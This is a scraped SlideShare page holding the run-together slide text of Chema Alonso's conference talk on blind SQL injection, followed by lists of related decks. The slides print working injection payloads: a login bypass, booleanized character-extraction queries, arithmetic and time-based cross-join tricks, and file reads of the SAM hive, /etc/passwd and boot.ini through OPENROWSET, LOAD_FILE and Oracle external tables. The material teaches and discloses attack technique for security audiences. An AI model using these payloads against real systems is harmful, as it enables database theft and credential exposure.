SlideShare a Scribd company logo

Playing With (B)Sqli

Download as PPTX, PDF
Chema Alonso, profile picture
Chema Alonso

The document discusses various SQL injection techniques, focusing on blind SQL injection methods that allow attackers to manipulate queries without directly viewing data. It covers concepts like time-based blind SQL injection, arithmetic blind SQL injection, and strategies to extract data from different database systems such as SQL Server, MySQL, and Oracle. The document emphasizes the need for sanitizing queries to prevent such vulnerabilities.

Technology
1 of 54
Downloaded 111 times
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
(Re) Playingwith (Blind) SQL InjectionChema AlonsoInformatica64 Microsoft MVP Enterprise Security
SQL Injection attacksA long time ago, in a galaxyfar, faraway…http://www.phrack.org/issues.html?id=8&issue=54
Back onthe 90sSelect id fromusers_tablewherelogin=‘$users’ and passw=‘$password’;UserPassword****************
Back onthe 90sSelect id fromusers_tablewherelogin=‘Admin’ and passw=‘’ or ‘1’=‘1’;UserAdminPassword‘ or ‘1’=‘1
Noteverybody….
ODBC Error messagesUsername: ' having 1=1-- [Microsoft][ODBC SQL Server Driver][SQL Server]Column 'users.id' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.Username: ' group by users.id having 1=1--[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'users.username' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause. And so on…
Evensecuritycompanies: Kaspersky
AgendaSerialized SQL InjectionDemo: XML ExtractorArithmetic SQL InjectionDivide byZeroSums and subtractionsTypeoveflowDemoRemoteFileDownloadingusingBlind SQL InjectionSQL SeverMySQLOracleDemo: RFD ToolTime-BasedBlind SQL Injectionusing heavy queriesDemo: MarathonTool
Serialized SQL Injection
Serialized SQL InjectionGoal: ToMergecomplexresultsets in a single showablefieldXML serializationfunctionsallowtoconvert a resultsetinto a oneXML string.It´spossibletodownloadbigamount of data with single and simple injections.
SQL ServerFOR XML: Retrieves data as a single stringrepresentingan XML tree. RAW: Mandatory option. Shows the information converting each row of the result set in an XML element in the form <row />.BINARY BASE64:The query will fail if we find any BINARY data type column (containing images, or passwords) if this option is not explicitly specified.union select '1','2','3',(select * from sysusers for xml raw, binary base64) XMLSCHEMA: obtains the whole table structure, including the data types, column names and other constraints.Described by DaniKachakil
MySQLNo default XML support, requires a server sideextensionGROUP_CONCAT (v 4.1+)
Oraclexmlforest, xmlelement,…No * support
Demo: Serialized SQL Injection
ArithmeticBlind SQL Injection
Blind AttacksAttacker injects code but can´t access directly to the data.However this injection changes the behavior of the web application. Then the attacker looks for differences between true code injections (1=1) and false code injections (1=2) in the response pages to extract data.Blind SQL InjectionBiind Xpath InjectionBlind LDAP Injection
Blind SQL Injection AttacksAttacker injects:“True where clauses”“False where clauses“Ex:Program.php?id=1 and 1=1Program.php?id=1 and 1=2Program doesn’t return any visible data from database or data in error messages.The attacker can´t see any data extracted from the database.
Blind SQL Injection AttacksAttacker analyzes the response pages looking for differences between “True-Answer Page” and “False-Answer Page”:Different hashesDifferent html structureDifferent patterns (keywords)Different linear ASCII sums“Different behavior”By example: Response Time
Blind SQL Injection AttacksIf any difference exists, then:Attacker can extract all information from databaseHow? Using “booleanization”MySQL:Program.php?id=1 and 100>(ASCII(Substring(user(),1,1)))“True-Answer Page” or “False-Answer Page”?MSSQL:Program.php?id=1 and 100>(Select top 1 ASCII(Substring(name,1,1))) from sysusers)Oracle:Program.php?id=1 and 100>(Select ASCII(Substr(username,1,1))) from all_users where rownum<=1)
Blind SQL Injection
ArithmeticBlind SQL InjectionThequeryforcestheparametertobenumericSELECT field FROM table WHERE id=abs(param)Ex:GetParam(ID)Select ….. Where att1=abs(ID)Select ….. Where att2=k1-IDPrint responseBooleanlogicneedstobecreatedwithmathoperations
ArithmeticBlind SQL InjectionDivide byzero (David Litchfield)Id=A+(1/(ASCII(B)-C))A-> Paramvalueoriginallyused in thequery.B -> Valuewe are searchingfor, e.g.: Substring(passwd,1,1)C-> Counter [0..255]When ASCII(B)=C, the DB willgenerate a divide byzeroexception.
ArithmeticBlind SQL InjectionSums and subtractionsId=A+ASCII(B)-CA-> Paramvalueoriginallyused in thequery.B -> Valuewe are searchingfor, e.g.: Substring(passwd,1,1)C-> Counter [0..255]When ASCII(B)=C, thenthe response page of id=A+ASCII(B)-C willbethesame as id=A
ArithmeticBlind SQL InjectionValuetypeoverflowId=A+((C/ASCII(B))*(K))A-> Paramvalueoriginallyused in thequery.B -> Valuewe are searchingfor, e.g.: Substring(passwd,1,1)C-> Counter [0..255]K-> Valuethatoverflowsthetypedefinedfor A(e.g.if A isinteger, then K=2^32)When C/ASCII(B)==1, K*1 overflowsthe data type
Demo: Divide byzeroSums and subtractionsIntegeroverflow
RemoteFileDownloadingusingBlind SQL Injectiontechniques
Accessing FilesTwo ways:Load the file in a temp tableand i>(select top 1 ASCII(Substring(column)(file,pos,1)) from temp_table ??Load the file in the queryWith every query the file is loaded in memoryI am very sorry, engine  and i>ASCII(Substring(load_file(file,pos,1))??
SQL Server 2K - External Data SourcesOnly for known filetypes:Access trough Drivers: Txt, csv, xls, mdb, logAnd 200>ASCII (SUBSTRING(SELECT * FROM OPENROWSET('MSDASQL', 'Driver = {Microsoft Text Driver (*.txt; *.csv)};DefaultDir=C:\;','select top 1 * from c:\dir\target.txt’),1,1))PrivilegesHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSSQLServer\Providers\DisallowAdhocAccess=0By default thiskeydoesn´texist so onlyuserswithServer Admin Role can use thesefunctions.NTFS permissions
SQL Server 2K – Bulk option Access to any file; Create Table TempTable as (row varchar(8000)) -- ; Bulk Insert TempTable From 'c:\file.ext' With (FIELDTERMINATOR = '\n', ROWTERMINATOR = '\n‘) -- ; alter table TempTable add num int IDENTITY(1,1) NOT NULL –and (select COUNT(row) from TempTable)and (select top 1 len(row) from TempTable where num = rownum) and (select top 1 ASCII(SUBSTRING(row,1,1)) from TempTable where num = 1) ; Drop Table TempTable--Privileges needed Server Role: BulkadminDatabase Role: db_owner o db_ddladminNTFS permissions
SQL Server 2k5 – 2k8OPENDATASOURCE and OPENROWSET supportedBulk options improvedAND 256 > ASCII(SUBSTRING ((SELECT * FROM OPENROWSET(BULK 'c:\windows\repair\sam', SINGLE_BLOB) As Data), 1, 1))—PermisionsBulkadmin Server RoleExternal Data Sources enabledSp_configureSurface configuration Tool for features
MySQLLoadFileSELECT LOAD_FILE(‘/etc/passwd’)SQLbfTools: MySQLgetcommand (illo and dab)http://www.reversing.org/node/view/11Load Data infile; Create table C8DFC643 (datosvarchar(4000)); Load data infile 'c:\\boot.ini' into table C8DFC643; alter table C8DFC643 add column num integer auto_increment unique keyand (select count(num) from C8DFC643)and (select length(datos) from C8DFC643 where num = 1)and (select ASCII(substring(datos,5,1)) from C8DFC643 where num = 1); Drop table C8DFC643
Oracle – Plain Text filesExternal Tables; execute immediate 'Create Directory A4A9308C As ''c:\'' '; end; -- ; execute immediate 'Create table A737D141 ( datos varchar2(4000) ) organization external (TYPE ORACLE_LOADER default directory A4A9308C access parameters ( records delimited by newline ) location (''boot.ini''))'; end;--Only Plain Text files
Oracle – DBMS_LOB; execute immediate ‘DECLARE l_bfile BFILE;l_blob BLOB;BEGIN INSERT INTO A737D141 (datos) VALUES (EMPTY_BLOB()) RETURN datos INTO l_blob;l_bfile := BFILENAME(''A4A9308C'', ''Picture.bmp'');DBMS_LOB.fileopen(l_bfile, Dbms_Lob.File_Readonly);DBMS_LOB.loadfromfile(l_blob,l_bfile,DBMS_LOB.getlength(l_bfile));DBMS_LOB.fileclose(l_bfile);COMMIT;EXCEPTION WHEN OTHERS THEN ROLLBACK;END;‘; end; --
Demo RFD
Time-basedBlind SQL Injectionusing heavy queries
Time-Based Blind SQL InjectionIn scenarios with no differences between “True-Answer Page” and “False-Answer Page”, time delays can be used.Injection forces a delay in the response page when the condition injected is True. - Delay functions:SQL Server: waitforOracle: dbms_lock.sleepMySQL: sleep or Benchmark FunctionPostgres: pg_sleepEx:; if (exists(select * fromusers)) waitfordelay '0:0:5’
Exploit for Solar Empire Web Game
Time-Based Blind SQL InjectionWhat about databases engines without delay functions, i.e., MS Access, Oracle connection without PL/SQL support, DB2, etc…?Can we still perform an exploitation of Time-Based Blind SQL Injection Attacks?
Yes, we can!
“Where-Clause” execution orderSelect “whatever “From whateverWhere condition1 and condition2- Condition1 lasts 10 seconds- Condition2 lasts 100 secondsWhich condition should be executed first?
The heavy condition first
The light condition first
Time-Based Blind SQL Injectionusing Heavy QueriesAttacker can perform an exploitation delaying the “True-answer page” using a heavy query.It depends on how the database engine evaluates the where clauses in the query.There are two types of database engines:Databases without optimization processDatabases with optimization process
Time-Based Blind SQL Injectionusing Heavy QueriesAttacker could inject a heavy Cross-Join condition for delaying the response page in True-Injections. The Cross-join injection must be heavier than the other condition.Attacker only have to know or to guess the name of a table with select permission in the database.Example in MSSQL:Program.php?id=1 and (SELECT count(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)>1 and 300>(select top 1 ascii(substring(name,1,1)) from sysusers)
“Default” tablestoconstruct a heavy queryMicrosoft SQL ServersysusersOracleall_usersMySQL (versión 5)information_schema.columnsMicrosoft AccessMSysAccessObjects (97 & 2000 versions)MSysAccessStorage (2003 & 2007)45
“Default” tablestoconstruct a heavy query…or whatever you can guessClientsCustomersNewsLoginsUsersProviders….Use your imagination…
Ex 1: MS SQL ServerQuery takes 14 seconds -> True-Answer
Ex 1: MS SQL ServerQuery takes 1 second -> False-Answer
Ex 2: OracleQuery Takes 22 seconds –> True-Answer
Ex 2: OracleQuery Takes 1 second –> False-Answer
Ex 3: Access 2007Query Takes 39 seconds –> True-Answer
Ex 3: Access 2007Query Takes 1 second –> False-Answer
Marathon ToolAutomates Time-Based Blind SQL Injection Attacks using Heavy Queries in SQL Server, MySQL, MS Access and Oracle Databases.Schema Extraction from known databasesExtract data using heavy queries not matter in which database engine (without schema)Developed in .NETSource code availablehttp://www.codeplex.com/marathontool
Demo: Marathon Tool

More Related Content

PDF
Sql Injection Myths and Fallacies
Karwin Software Solutions LLC
 
PDF
SQL Injection: complete walkthrough (not only) for PHP developers
Krzysztof Kotowicz
 
PPT
ShmooCon 2009 - (Re)Playing(Blind)Sql
Chema Alonso
 
PPT
Advanced Topics On Sql Injection Protection
amiable_indian
 
PDF
SQL Injection Tutorial
Magno Logan
 
PDF
Advanced SQL injection to operating system full control (slides)
Bernardo Damele A. G.
 
PDF
Not so blind SQL Injection
Francisco Ribeiro
 
PDF
Advanced SQL Injection: Attacks
Nuno Loureiro
 
Sql Injection Myths and Fallacies
Karwin Software Solutions LLC
 
SQL Injection: complete walkthrough (not only) for PHP developers
Krzysztof Kotowicz
 
ShmooCon 2009 - (Re)Playing(Blind)Sql
Chema Alonso
 
Advanced Topics On Sql Injection Protection
amiable_indian
 
SQL Injection Tutorial
Magno Logan
 
Advanced SQL injection to operating system full control (slides)
Bernardo Damele A. G.
 
Not so blind SQL Injection
Francisco Ribeiro
 
Advanced SQL Injection: Attacks
Nuno Loureiro
 

What's hot (20)

PPT
Asegúr@IT IV - Remote File Downloading
Chema Alonso
 
PDF
SQL injection: Not only AND 1=1
Bernardo Damele A. G.
 
PDF
ORM Injection
Simone Onofri
 
PPT
SQL Injection
Adhoura Academy
 
PPTX
Codemotion 2013: Feliz 15 aniversario, SQL Injection
Chema Alonso
 
PDF
Rapid prototyping search applications with solr
Lucidworks (Archived)
 
PDF
SQL Injection
Abhinav Nair
 
PPTX
Hacking Oracle From Web Apps 1 9
sumsid1234
 
PPTX
03. sql and other injection module v17
Eoin Keary
 
PDF
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
Pichaya Morimoto
 
PPT
Advanced SQL Injection
amiable_indian
 
PDF
Sq linjection
Mahesh Gupta (DBATAG) - SQL Server Consultant
 
PPT
Web application attacks using Sql injection and countermasures
Cade Zvavanjanja
 
PDF
Asp
Adil Jafri
 
PDF
Appreciative Advanced Blind SQLI Attack
ijtsrd
 
PPTX
Sql injection
Hemendra Kumar
 
PDF
Full MSSQL Injection PWNage
Prathan Phongthiproek
 
PDF
ORM2Pwn: Exploiting injections in Hibernate ORM
Mikhail Egorov
 
PDF
What is advanced SQL Injection? Infographic
JW CyberNerd
 
PPT
SQLMAP Tool Usage - A Heads Up
Mindfire Solutions
 
Asegúr@IT IV - Remote File Downloading
Chema Alonso
 
SQL injection: Not only AND 1=1
Bernardo Damele A. G.
 
ORM Injection
Simone Onofri
 
SQL Injection
Adhoura Academy
 
Codemotion 2013: Feliz 15 aniversario, SQL Injection
Chema Alonso
 
Rapid prototyping search applications with solr
Lucidworks (Archived)
 
SQL Injection
Abhinav Nair
 
Hacking Oracle From Web Apps 1 9
sumsid1234
 
03. sql and other injection module v17
Eoin Keary
 
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
Pichaya Morimoto
 
Advanced SQL Injection
amiable_indian
 
Sq linjection
Mahesh Gupta (DBATAG) - SQL Server Consultant
 
Web application attacks using Sql injection and countermasures
Cade Zvavanjanja
 
Asp
Adil Jafri
 
Appreciative Advanced Blind SQLI Attack
ijtsrd
 
Sql injection
Hemendra Kumar
 
Full MSSQL Injection PWNage
Prathan Phongthiproek
 
ORM2Pwn: Exploiting injections in Hibernate ORM
Mikhail Egorov
 
What is advanced SQL Injection? Infographic
JW CyberNerd
 
SQLMAP Tool Usage - A Heads Up
Mindfire Solutions
 
Ad

Viewers also liked (17)

PDF
JTRIG (Joint Threat Research Intelligence Group) Spying Tools
Chema Alonso
 
PDF
Owning bad guys {and mafia} with javascript botnets
Chema Alonso
 
PPT
Time-Based Blind SQL Injection using Heavy Queries
Chema Alonso
 
PPT
How "·$% developers defeat the web vulnerability scanners
Chema Alonso
 
PDF
Auditoría de TrueCrypt: Informe final fase II
Chema Alonso
 
PPTX
Hachetetepé dos puntos SLAAC SLAAC
Chema Alonso
 
PPT
Defcon 18: FOCA 2
Chema Alonso
 
PDF
Connection String Parameter Pollution Attacks
Chema Alonso
 
PPTX
Codemotion ES 2014: Love Always Takes Care & Humility
Chema Alonso
 
PPTX
Defcon 21 - Fear the Evil FOCA: mitm attacks using IPv6
Chema Alonso
 
PPT
Circuitos de Video Vigilancia IP
Chema Alonso
 
PPTX
Tu iPhone es tan (in)seguro como tu Windows
Chema Alonso
 
PPTX
FC00::1 (Algunos) Ataques en IPv6
Chema Alonso
 
PPT
Trends in network security feinstein - informatica64
Chema Alonso
 
PPTX
Cazando Cibercriminales con: OSINT + Cloud Computing + Big Data
Chema Alonso
 
PPT
Informática64 - Metadata Security
Chema Alonso
 
PPT
Microsoft Technet - Microsoft Forefront
Chema Alonso
 
JTRIG (Joint Threat Research Intelligence Group) Spying Tools
Chema Alonso
 
Owning bad guys {and mafia} with javascript botnets
Chema Alonso
 
Time-Based Blind SQL Injection using Heavy Queries
Chema Alonso
 
How "·$% developers defeat the web vulnerability scanners
Chema Alonso
 
Auditoría de TrueCrypt: Informe final fase II
Chema Alonso
 
Hachetetepé dos puntos SLAAC SLAAC
Chema Alonso
 
Defcon 18: FOCA 2
Chema Alonso
 
Connection String Parameter Pollution Attacks
Chema Alonso
 
Codemotion ES 2014: Love Always Takes Care & Humility
Chema Alonso
 
Defcon 21 - Fear the Evil FOCA: mitm attacks using IPv6
Chema Alonso
 
Circuitos de Video Vigilancia IP
Chema Alonso
 
Tu iPhone es tan (in)seguro como tu Windows
Chema Alonso
 
FC00::1 (Algunos) Ataques en IPv6
Chema Alonso
 
Trends in network security feinstein - informatica64
Chema Alonso
 
Cazando Cibercriminales con: OSINT + Cloud Computing + Big Data
Chema Alonso
 
Informática64 - Metadata Security
Chema Alonso
 
Microsoft Technet - Microsoft Forefront
Chema Alonso
 
Ad

Similar to Playing With (B)Sqli (20)

PPT
Advanced Sql Injection ENG
Dmitry Evteev
 
PPT
Sql Injection Adv Owasp
Aung Khant
 
PPT
SQL Injection in PHP
Dave Ross
 
PPT
ShmooCON 2009 : Re-playing with (Blind) SQL Injection
Chema Alonso
 
PPTX
How did i steal your database
Mostafa Siraj
 
PPT
SQL Injection Attacks
Compare Infobase Limited
 
PPT
Sql injection
Nitish Kumar
 
PDF
SQL2SPARQL
Alexandru Dron
 
PPTX
Understanding and preventing sql injection attacks
Kevin Kline
 
PPTX
PHP FUNCTIONS
Zeeshan Ahmed
 
PPT
Sql Injection Attacks Siddhesh
Siddhesh Bhobe
 
PPTX
Sql injection
Mehul Boghra
 
PPT
Mysql
Rathan Raj
 
PDF
Python RESTful webservices with Python: Flask and Django solutions
Solution4Future
 
ODP
Exploring Symfony's Code
Wildan Maulana
 
PPT
General Principles of Web Security
jemond
 
PPT
Security.ppt
webhostingguy
 
PPT
12-security.ppt - PHP and Arabic Language - Index
webhostingguy
 
PPTX
Web Security - Hands-on
Andrea Valenza
 
PDF
Defcon_Oracle_The_Making_of_the_2nd_sql_injection_worm
guest785f78
 
Advanced Sql Injection ENG
Dmitry Evteev
 
Sql Injection Adv Owasp
Aung Khant
 
SQL Injection in PHP
Dave Ross
 
ShmooCON 2009 : Re-playing with (Blind) SQL Injection
Chema Alonso
 
How did i steal your database
Mostafa Siraj
 
SQL Injection Attacks
Compare Infobase Limited
 
Sql injection
Nitish Kumar
 
SQL2SPARQL
Alexandru Dron
 
Understanding and preventing sql injection attacks
Kevin Kline
 
PHP FUNCTIONS
Zeeshan Ahmed
 
Sql Injection Attacks Siddhesh
Siddhesh Bhobe
 
Sql injection
Mehul Boghra
 
Mysql
Rathan Raj
 
Python RESTful webservices with Python: Flask and Django solutions
Solution4Future
 
Exploring Symfony's Code
Wildan Maulana
 
General Principles of Web Security
jemond
 
Security.ppt
webhostingguy
 
12-security.ppt - PHP and Arabic Language - Index
webhostingguy
 
Web Security - Hands-on
Andrea Valenza
 
Defcon_Oracle_The_Making_of_the_2nd_sql_injection_worm
guest785f78
 

More from Chema Alonso (20)

PPTX
CyberCamp 2015: Low Hanging Fruit
Chema Alonso
 
PDF
Índice Pentesting con Kali 2.0
Chema Alonso
 
PDF
Configurar y utilizar Latch en Magento
Chema Alonso
 
PDF
New Paradigms of Digital Identity: Authentication & Authorization as a Servic...
Chema Alonso
 
PDF
CritoReto 4: Buscando una aguja en un pajar
Chema Alonso
 
PDF
Dorking & Pentesting with Tacyt
Chema Alonso
 
PDF
Pentesting con PowerShell: Libro de 0xWord
Chema Alonso
 
PDF
Foca API v0.1
Chema Alonso
 
PDF
Recuperar dispositivos de sonido en Windows Vista y Windows 7
Chema Alonso
 
PPTX
It's a Kind of Magic
Chema Alonso
 
PPTX
Ingenieros y hackers
Chema Alonso
 
PDF
Cuarta Edición del Curso Online de Especialización en Seguridad Informática p...
Chema Alonso
 
PPTX
El juego es el mismo
Chema Alonso
 
PDF
El Hardware en Apple ¿Es tan bueno?
Chema Alonso
 
PDF
Latch en Linux (Ubuntu): El cerrojo digital
Chema Alonso
 
PDF
Hacking con Python
Chema Alonso
 
PPTX
Shuabang Botnet
Chema Alonso
 
PDF
Analizando la efectividad de ataques de correlación pasivos en la red de ano...
Chema Alonso
 
PDF
Guía de uso de Latch en la UNIR
Chema Alonso
 
PDF
Curso Online de Especialización en Seguridad Informática para la Ciberdefensa
Chema Alonso
 
CyberCamp 2015: Low Hanging Fruit
Chema Alonso
 
Índice Pentesting con Kali 2.0
Chema Alonso
 
Configurar y utilizar Latch en Magento
Chema Alonso
 
New Paradigms of Digital Identity: Authentication & Authorization as a Servic...
Chema Alonso
 
CritoReto 4: Buscando una aguja en un pajar
Chema Alonso
 
Dorking & Pentesting with Tacyt
Chema Alonso
 
Pentesting con PowerShell: Libro de 0xWord
Chema Alonso
 
Foca API v0.1
Chema Alonso
 
Recuperar dispositivos de sonido en Windows Vista y Windows 7
Chema Alonso
 
It's a Kind of Magic
Chema Alonso
 
Ingenieros y hackers
Chema Alonso
 
Cuarta Edición del Curso Online de Especialización en Seguridad Informática p...
Chema Alonso
 
El juego es el mismo
Chema Alonso
 
El Hardware en Apple ¿Es tan bueno?
Chema Alonso
 
Latch en Linux (Ubuntu): El cerrojo digital
Chema Alonso
 
Hacking con Python
Chema Alonso
 
Shuabang Botnet
Chema Alonso
 
Analizando la efectividad de ataques de correlación pasivos en la red de ano...
Chema Alonso
 
Guía de uso de Latch en la UNIR
Chema Alonso
 
Curso Online de Especialización en Seguridad Informática para la Ciberdefensa
Chema Alonso
 

Recently uploaded (20)

PPTX
VMware vSphere Foundation How to Sell Presentation-Ver1.4-2-14-2024.pptx
blackmambaettijean
 
PDF
Diabetes mellitus diagnosis method based random forest with bat algorithm
IAESIJAI
 
PDF
Electronic commerce courselecture one. Pdf
OmerMohamed64
 
PDF
TokAI - TikTok AI Agent : The First AI Application That Analyzes 10,000+ Vira...
SOFTTECHHUB
 
PDF
Empathic Computing: Creating Shared Understanding
Mark Billinghurst
 
PDF
7 ChatGPT Prompts to Help You Define Your Ideal Customer Profile.pdf
SOFTTECHHUB
 
PPTX
Understanding_Digital_Forensics_Presentation.pptx
ImranKhan423233
 
PPTX
Detection-First SIEM: Rule Types, Dashboards, and Threat-Informed Strategy
ReZa AdineH
 
PDF
Network Security Unit 5.pdf for BCA BBA.
Serpent6
 
PPTX
Big Data Technologies - Introduction.pptx
kuthubussaman1
 
PDF
NewMind AI Monthly Chronicles - July 2025
NewMind AI
 
PDF
Unlocking AI with Model Context Protocol (MCP)
Brian McKeiver
 
PDF
Per capita expenditure prediction using model stacking based on satellite ima...
IAESIJAI
 
PDF
KodekX | Application Modernization Development
KodekX
 
PDF
Encapsulation_ Review paper, used for researhc scholars
gurumoop
 
PDF
Build a system with the filesystem maintained by OSTree @ COSCUP 2025
Jian-Hong Pan
 
DOCX
The AUB Centre for AI in Media Proposal.docx
GAONE9
 
PDF
Dropbox Q2 2025 Financial Results & Investor Presentation
Dropbox
 
PDF
Peak of Data & AI Encore- AI for Metadata and Smarter Workflows
Safe Software
 
PDF
Chapter 3 Spatial Domain Image Processing.pdf
Getnet Tigabie Askale -(GM)
 
VMware vSphere Foundation How to Sell Presentation-Ver1.4-2-14-2024.pptx
blackmambaettijean
 
Diabetes mellitus diagnosis method based random forest with bat algorithm
IAESIJAI
 
Electronic commerce courselecture one. Pdf
OmerMohamed64
 
TokAI - TikTok AI Agent : The First AI Application That Analyzes 10,000+ Vira...
SOFTTECHHUB
 
Empathic Computing: Creating Shared Understanding
Mark Billinghurst
 
7 ChatGPT Prompts to Help You Define Your Ideal Customer Profile.pdf
SOFTTECHHUB
 
Understanding_Digital_Forensics_Presentation.pptx
ImranKhan423233
 
Detection-First SIEM: Rule Types, Dashboards, and Threat-Informed Strategy
ReZa AdineH
 
Network Security Unit 5.pdf for BCA BBA.
Serpent6
 
Big Data Technologies - Introduction.pptx
kuthubussaman1
 
NewMind AI Monthly Chronicles - July 2025
NewMind AI
 
Unlocking AI with Model Context Protocol (MCP)
Brian McKeiver
 
Per capita expenditure prediction using model stacking based on satellite ima...
IAESIJAI
 
KodekX | Application Modernization Development
KodekX
 
Encapsulation_ Review paper, used for researhc scholars
gurumoop
 
Build a system with the filesystem maintained by OSTree @ COSCUP 2025
Jian-Hong Pan
 
The AUB Centre for AI in Media Proposal.docx
GAONE9
 
Dropbox Q2 2025 Financial Results & Investor Presentation
Dropbox
 
Peak of Data & AI Encore- AI for Metadata and Smarter Workflows
Safe Software
 
Chapter 3 Spatial Domain Image Processing.pdf
Getnet Tigabie Askale -(GM)
 

Playing With (B)Sqli

  • 1. (Re) Playingwith (Blind) SQL InjectionChema AlonsoInformatica64 Microsoft MVP Enterprise Security
  • 2. SQL Injection attacksA long time ago, in a galaxyfar, faraway…http://www.phrack.org/issues.html?id=8&issue=54
  • 3. Back onthe 90sSelect id fromusers_tablewherelogin=‘$users’ and passw=‘$password’;UserPassword****************
  • 4. Back onthe 90sSelect id fromusers_tablewherelogin=‘Admin’ and passw=‘’ or ‘1’=‘1’;UserAdminPassword‘ or ‘1’=‘1
  • 6. ODBC Error messagesUsername: ' having 1=1-- [Microsoft][ODBC SQL Server Driver][SQL Server]Column 'users.id' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.Username: ' group by users.id having 1=1--[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'users.username' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause. And so on…
  • 8. AgendaSerialized SQL InjectionDemo: XML ExtractorArithmetic SQL InjectionDivide byZeroSums and subtractionsTypeoveflowDemoRemoteFileDownloadingusingBlind SQL InjectionSQL SeverMySQLOracleDemo: RFD ToolTime-BasedBlind SQL Injectionusing heavy queriesDemo: MarathonTool
  • 10. Serialized SQL InjectionGoal: ToMergecomplexresultsets in a single showablefieldXML serializationfunctionsallowtoconvert a resultsetinto a oneXML string.It´spossibletodownloadbigamount of data with single and simple injections.
  • 11. SQL ServerFOR XML: Retrieves data as a single stringrepresentingan XML tree. RAW: Mandatory option. Shows the information converting each row of the result set in an XML element in the form <row />.BINARY BASE64:The query will fail if we find any BINARY data type column (containing images, or passwords) if this option is not explicitly specified.union select '1','2','3',(select * from sysusers for xml raw, binary base64) XMLSCHEMA: obtains the whole table structure, including the data types, column names and other constraints.Described by DaniKachakil
  • 12. MySQLNo default XML support, requires a server sideextensionGROUP_CONCAT (v 4.1+)
  • 16. Blind AttacksAttacker injects code but can´t access directly to the data.However this injection changes the behavior of the web application. Then the attacker looks for differences between true code injections (1=1) and false code injections (1=2) in the response pages to extract data.Blind SQL InjectionBiind Xpath InjectionBlind LDAP Injection
  • 17. Blind SQL Injection AttacksAttacker injects:“True where clauses”“False where clauses“Ex:Program.php?id=1 and 1=1Program.php?id=1 and 1=2Program doesn’t return any visible data from database or data in error messages.The attacker can´t see any data extracted from the database.
  • 18. Blind SQL Injection AttacksAttacker analyzes the response pages looking for differences between “True-Answer Page” and “False-Answer Page”:Different hashesDifferent html structureDifferent patterns (keywords)Different linear ASCII sums“Different behavior”By example: Response Time
  • 19. Blind SQL Injection AttacksIf any difference exists, then:Attacker can extract all information from databaseHow? Using “booleanization”MySQL:Program.php?id=1 and 100>(ASCII(Substring(user(),1,1)))“True-Answer Page” or “False-Answer Page”?MSSQL:Program.php?id=1 and 100>(Select top 1 ASCII(Substring(name,1,1))) from sysusers)Oracle:Program.php?id=1 and 100>(Select ASCII(Substr(username,1,1))) from all_users where rownum<=1)
  • 21. ArithmeticBlind SQL InjectionThequeryforcestheparametertobenumericSELECT field FROM table WHERE id=abs(param)Ex:GetParam(ID)Select ….. Where att1=abs(ID)Select ….. Where att2=k1-IDPrint responseBooleanlogicneedstobecreatedwithmathoperations
  • 22. ArithmeticBlind SQL InjectionDivide byzero (David Litchfield)Id=A+(1/(ASCII(B)-C))A-> Paramvalueoriginallyused in thequery.B -> Valuewe are searchingfor, e.g.: Substring(passwd,1,1)C-> Counter [0..255]When ASCII(B)=C, the DB willgenerate a divide byzeroexception.
  • 23. ArithmeticBlind SQL InjectionSums and subtractionsId=A+ASCII(B)-CA-> Paramvalueoriginallyused in thequery.B -> Valuewe are searchingfor, e.g.: Substring(passwd,1,1)C-> Counter [0..255]When ASCII(B)=C, thenthe response page of id=A+ASCII(B)-C willbethesame as id=A
  • 24. ArithmeticBlind SQL InjectionValuetypeoverflowId=A+((C/ASCII(B))*(K))A-> Paramvalueoriginallyused in thequery.B -> Valuewe are searchingfor, e.g.: Substring(passwd,1,1)C-> Counter [0..255]K-> Valuethatoverflowsthetypedefinedfor A(e.g.if A isinteger, then K=2^32)When C/ASCII(B)==1, K*1 overflowsthe data type
  • 25. Demo: Divide byzeroSums and subtractionsIntegeroverflow
  • 27. Accessing FilesTwo ways:Load the file in a temp tableand i>(select top 1 ASCII(Substring(column)(file,pos,1)) from temp_table ??Load the file in the queryWith every query the file is loaded in memoryI am very sorry, engine  and i>ASCII(Substring(load_file(file,pos,1))??
  • 28. SQL Server 2K - External Data SourcesOnly for known filetypes:Access trough Drivers: Txt, csv, xls, mdb, logAnd 200>ASCII (SUBSTRING(SELECT * FROM OPENROWSET('MSDASQL', 'Driver = {Microsoft Text Driver (*.txt; *.csv)};DefaultDir=C:\;','select top 1 * from c:\dir\target.txt’),1,1))PrivilegesHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSSQLServer\Providers\DisallowAdhocAccess=0By default thiskeydoesn´texist so onlyuserswithServer Admin Role can use thesefunctions.NTFS permissions
  • 29. SQL Server 2K – Bulk option Access to any file; Create Table TempTable as (row varchar(8000)) -- ; Bulk Insert TempTable From 'c:\file.ext' With (FIELDTERMINATOR = '\n', ROWTERMINATOR = '\n‘) -- ; alter table TempTable add num int IDENTITY(1,1) NOT NULL –and (select COUNT(row) from TempTable)and (select top 1 len(row) from TempTable where num = rownum) and (select top 1 ASCII(SUBSTRING(row,1,1)) from TempTable where num = 1) ; Drop Table TempTable--Privileges needed Server Role: BulkadminDatabase Role: db_owner o db_ddladminNTFS permissions
  • 30. SQL Server 2k5 – 2k8OPENDATASOURCE and OPENROWSET supportedBulk options improvedAND 256 > ASCII(SUBSTRING ((SELECT * FROM OPENROWSET(BULK 'c:\windows\repair\sam', SINGLE_BLOB) As Data), 1, 1))—PermisionsBulkadmin Server RoleExternal Data Sources enabledSp_configureSurface configuration Tool for features
